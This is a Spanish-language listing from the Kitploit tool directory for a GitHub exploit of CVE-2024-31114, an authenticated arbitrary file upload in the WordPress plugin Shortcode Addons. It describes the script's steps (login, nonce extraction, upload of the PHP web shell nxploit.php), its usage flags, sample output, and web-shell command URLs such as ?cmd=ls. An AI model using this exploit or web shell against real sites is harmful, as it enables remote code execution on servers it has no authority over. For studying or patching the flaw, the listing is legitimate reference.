Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-31114 — Shortcode Addons <= 3.2.5 - Carga Arbitraria de Archivos Autenticada (Admin+) | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2024-31114
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubnxploited/cve-2024-31114

CVE-2024-31114

Shortcode Addons <= 3.2.5 - Carga Arbitraria de Archivos Autenticada (Admin+)

Ver Repositorio
2hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-31114 - Exploit RCE de Shortcode Addons de WordPress

Shortcode Addons <= 3.2.5 – Subida arbitraria de archivos autenticada (Admin+)
CVE ID: CVE-2024-31114
Puntuación CVSS: 9.1 (Crítica)


🛠️ Descripción de la vulnerabilidad

El complemento Shortcode Addons – con Visual Composer, Divi, Beaver Builder y Elementor Extension para WordPress es vulnerable a la subida arbitraria de archivos debido a la falta de validación del tipo de archivo en todas las versiones hasta la 3.2.5 inclusive.

Esta falla permite a atacantes autenticados con acceso de nivel administrador o superior subir archivos arbitrarios al servidor, lo que puede conducir a una ejecución remota de código (RCE).


🚀 Descripción del script

Este script de Python automatiza la explotación de esta vulnerabilidad. Realiza lo siguiente:

  1. Deshabilitar la verificación SSL
  2. Iniciar sesión con las credenciales proporcionadas
  3. Extraer el token CSRF (_wpnonce)
  4. Generar un shell PHP (nxploit.php)
  5. Comprimirlo y subirlo como .zip
  6. Confirmar la subida y acceder al shell
  7. Ejecutar whoami en el servidor objetivo

🧪 Uso

usage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD

Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
By: Nxploited | Khaled Alenazi

options:
  -h, --help            Show this help message and exit
  -u, --url URL         Target URL (e.g. http://target.com)
  -un, --username USERNAME   WordPress Admin Username
  -p, --password PASSWORD    WordPress Admin Password

📤 Ejemplo de salida

[+] Authentication successful.
[+] _wpnonce extracted: 9d8dbbc630
[+] Payload nxploit.zip created.
[+] Payload uploaded.
[+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
[+] Command output:
------------------
www-data
------------------
[+] Temporary files removed.

🐚 Uso de la Web Shell

Una vez que se haya subido el payload, puedes ejecutar comandos del sistema utilizando el siguiente formato:

http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command

🔹 Ejemplo:

http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls

Esto listará el contenido del directorio actual en el servidor.

⚠️ Descargo de responsabilidad

Esta herramienta es solo para fines educativos y de pruebas autorizadas.
El autor no es responsable de ningún uso indebido o daño causado por este script.

Úsala de forma responsable y solo en sistemas en los que tengas permiso explícito para realizar pruebas.


Por: Nxploited | Khaled Alenazi

Descargar herramienta